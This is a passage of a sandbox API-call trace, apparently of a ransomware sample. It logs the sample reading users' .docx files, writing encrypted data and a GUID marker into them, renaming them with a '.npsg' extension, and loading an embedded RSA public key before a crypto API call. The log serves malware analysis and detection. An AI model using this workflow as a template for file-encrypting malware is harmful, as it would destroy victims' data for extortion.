hHeap=0x620000) returned 1 [0236.778] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.778] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.779] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x29e0) returned 0x3b81cd0 [0236.779] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b957d0 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95818 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400338 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.779] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b846b8 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b846b8 | out: hHeap=0x620000) returned 1 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400338 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400320 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.780] GetCurrentThreadId () returned 0x5b4 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79468 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.781] GetCurrentThreadId () returned 0x5b4 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400320 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400338 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400308 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400398 [0236.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400368 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400350 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003b0 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400350 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400368 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400320 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400350 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400338 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95818 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.785] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x29d1, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb14*=0x29d1, lpOverlapped=0x0) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.785] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x29d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.785] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.786] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.786] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.786] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.786] CloseHandle (hObject=0x644) returned 1 [0236.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0236.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0236.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0236.788] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PFoVTxzbqocze_Y6chw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pfovtxzbqocze_y6chw.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PFoVTxzbqocze_Y6chw.docx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pfovtxzbqocze_y6chw.docx.npsg")) returned 1 [0236.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.791] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.792] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe232fe0, ftCreationTime.dwHighDateTime=0x1d55433, ftLastAccessTime.dwLowDateTime=0xb0ce3130, ftLastAccessTime.dwHighDateTime=0x1d578e3, ftLastWriteTime.dwLowDateTime=0xb0ce3130, ftLastWriteTime.dwHighDateTime=0x1d578e3, nFileSizeHigh=0x0, nFileSizeLow=0xd4ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SAsKqjMtaP8ZXgThhx.docx", cAlternateFileName="SASKQJ~1.DOC")) returned 1 [0236.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.792] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SAsKqjMtaP8ZXgThhx.docx") returned=".docx" [0236.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SAsKqjMtaP8ZXgThhx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\saskqjmtap8zxgthhx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.793] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=54474) returned 1 [0236.793] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.795] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd4a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.795] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.797] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.797] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xd4ca, lpOverlapped=0x0) returned 1 [0236.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.798] CryptAcquireContextW (in: phProv=0x39afa50, 